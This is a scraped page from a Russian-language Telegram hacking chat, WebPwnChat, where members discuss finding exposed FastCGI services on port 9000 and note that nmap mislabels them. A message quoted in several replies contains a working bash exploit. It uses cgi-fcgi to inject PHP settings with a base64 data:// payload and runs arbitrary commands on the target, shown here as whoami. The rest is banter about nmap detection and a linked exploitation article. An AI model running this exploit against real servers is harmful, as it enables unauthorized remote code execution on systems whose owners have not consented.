В рейтинге участвует:

групп:

каналов:

Виртуальный сервер на SSD - недорого!

Аренда выделенных и виртуальных серверов (VDS/VPS), хостинг, аренда IP-адресов, администрирование, круглосуточная поддержка

qwarta.ru подробнее

Резервное копирование с проверкой на вирусы!!!

Удобный сервис создания резервных копий на любой сервер сети интернет. Отслеживайте изменения, проверяйте на вирусы. Надежно защитите свой бизнес!

go.backupland.com

Выбираете сервер? Любая конфигурация на заказ!

Аренда физических серверов любых конфигураций под любые запросы - 1С бухгалтерия, игровые сервера, нагруженные проекты, интернет-магазины!

qwarta.ru подробнее

Size: a a a

WebPwnChat

1189 membersпожаловаться на группу
2020 November 09

B

Bo🦠oM in WebPwnChat
🙂
источник
16:01пожаловаться#1

ДТ

Дональд Трамп... in WebPwnChat
ID:0
Видел хоть раз открытый порт 9000?
Nmap (даже с аргументом -sV) не опознает его, а скорее всего это был FastCGI.

А самое классное - что это выполнение произвольного кода, достаточно подрубиться к нему, например, таким bash-скриптом:

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';" # Команда
FILENAMES="/var/www/public/index.php" # Путь к существующему файлу

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
    OUTPUT=$(mktemp)
    env -i \
      PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
      SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
      cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

    cat $OUTPUT
done


Или воспользоваться более мощным клиентом, например, таким.
ну если точнее то почти не пользуюсь
источник
16:01пожаловаться#2

B

Bo🦠oM in WebPwnChat
Ну nmap помечает его как cslistener
источник
16:01пожаловаться#3

B

Bo🦠oM in WebPwnChat
А потом все гуглят
источник
16:01пожаловаться#4

ДТ

Дональд Трамп... in WebPwnChat
ID:0
Видел хоть раз открытый порт 9000?
Nmap (даже с аргументом -sV) не опознает его, а скорее всего это был FastCGI.

А самое классное - что это выполнение произвольного кода, достаточно подрубиться к нему, например, таким bash-скриптом:

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';" # Команда
FILENAMES="/var/www/public/index.php" # Путь к существующему файлу

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
    OUTPUT=$(mktemp)
    env -i \
      PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
      SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
      cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

    cat $OUTPUT
done


Или воспользоваться более мощным клиентом, например, таким.
я полагаю речь идет о том что nmap не может понять что именно слушает 9000 порт
источник
16:01пожаловаться#5

B

Bo🦠oM in WebPwnChat
Bo🦠oM
А потом все гуглят
Но мало кто понимает, что это априори рце
источник
16:02пожаловаться#6

L

Lord Voldemort in WebPwnChat
Bo🦠oM
Но мало кто понимает, что это априори рце
еще определяет как
https-simple-new
источник
16:03пожаловаться#7

ДТ

Дональд Трамп... in WebPwnChat
ID:0
Видел хоть раз открытый порт 9000?
Nmap (даже с аргументом -sV) не опознает его, а скорее всего это был FastCGI.

А самое классное - что это выполнение произвольного кода, достаточно подрубиться к нему, например, таким bash-скриптом:

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';" # Команда
FILENAMES="/var/www/public/index.php" # Путь к существующему файлу

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
    OUTPUT=$(mktemp)
    env -i \
      PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
      SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
      cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

    cat $OUTPUT
done


Или воспользоваться более мощным клиентом, например, таким.
https://titanwolf.org/Network/Articles/Article?AID=2dd35527-28c3-46a9-a3df-9a4d3a956a12#gsc.tab=0
источник
16:07пожаловаться#8

ДТ

Дональд Трамп... in WebPwnChat
ID:0
Видел хоть раз открытый порт 9000?
Nmap (даже с аргументом -sV) не опознает его, а скорее всего это был FastCGI.

А самое классное - что это выполнение произвольного кода, достаточно подрубиться к нему, например, таким bash-скриптом:

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';" # Команда
FILENAMES="/var/www/public/index.php" # Путь к существующему файлу

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
    OUTPUT=$(mktemp)
    env -i \
      PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
      SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
      cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

    cat $OUTPUT
done


Или воспользоваться более мощным клиентом, например, таким.
ну вот например статейка, довольно старая правда, про эксплуатацию fcgi
источник
16:08пожаловаться#9

O

OneMansArmy in WebPwnChat
XRUST
как всегда admin:admin а потом ФБР пишет хакеры украли и тд
РЖД подарили хацкерам :D СМИ ❤️
источник
16:13пожаловаться#10

А

Алексей in WebPwnChat
ID:0
Видел хоть раз открытый порт 9000?
Nmap (даже с аргументом -sV) не опознает его, а скорее всего это был FastCGI.

А самое классное - что это выполнение произвольного кода, достаточно подрубиться к нему, например, таким bash-скриптом:

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';" # Команда
FILENAMES="/var/www/public/index.php" # Путь к существующему файлу

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
    OUTPUT=$(mktemp)
    env -i \
      PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
      SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
      cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

    cat $OUTPUT
done


Или воспользоваться более мощным клиентом, например, таким.
Нужон нмаповский скрипт на определение
источник
16:13пожаловаться#11

А

Алексей in WebPwnChat
ID:0
Видел хоть раз открытый порт 9000?
Nmap (даже с аргументом -sV) не опознает его, а скорее всего это был FastCGI.

А самое классное - что это выполнение произвольного кода, достаточно подрубиться к нему, например, таким bash-скриптом:

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';" # Команда
FILENAMES="/var/www/public/index.php" # Путь к существующему файлу

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
    OUTPUT=$(mktemp)
    env -i \
      PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
      SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
      cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

    cat $OUTPUT
done


Или воспользоваться более мощным клиентом, например, таким.
Ради комьюнити
источник
16:13пожаловаться#12

BF

Billy Fox in WebPwnChat
OneMansArmy
РЖД подарили хацкерам :D СМИ ❤️
ЛОЛ
источник
16:14пожаловаться#13

L

Lucky in WebPwnChat
OneMansArmy
РЖД подарили хацкерам :D СМИ ❤️
мгмда, пришлось блин в очереди аж на скачку стоять
источник
16:17пожаловаться#14

L

Lord Voldemort in WebPwnChat
Дональд Трамп
https://titanwolf.org/Network/Articles/Article?AID=2dd35527-28c3-46a9-a3df-9a4d3a956a12#gsc.tab=0
Хорошая статейка
источник
16:21пожаловаться#15

ДТ

Дональд Трамп... in WebPwnChat
Алексей
Нужон нмаповский скрипт на определение
согл
источник
16:22пожаловаться#16

q

q|z in WebPwnChat
странно, мне казалось телега банит такие имена
источник
16:24пожаловаться#17

A

Aba in WebPwnChat
q|z
странно, мне казалось телега банит такие имена
мб вкуме с аватаркой будет банить...
источник
16:24пожаловаться#18

A

Aba in WebPwnChat
вообще тоже слышал, что должны банить
источник
16:25пожаловаться#19

ДТ

Дональд Трамп... in WebPwnChat
q|z
странно, мне казалось телега банит такие имена
банит
источник
16:25пожаловаться#20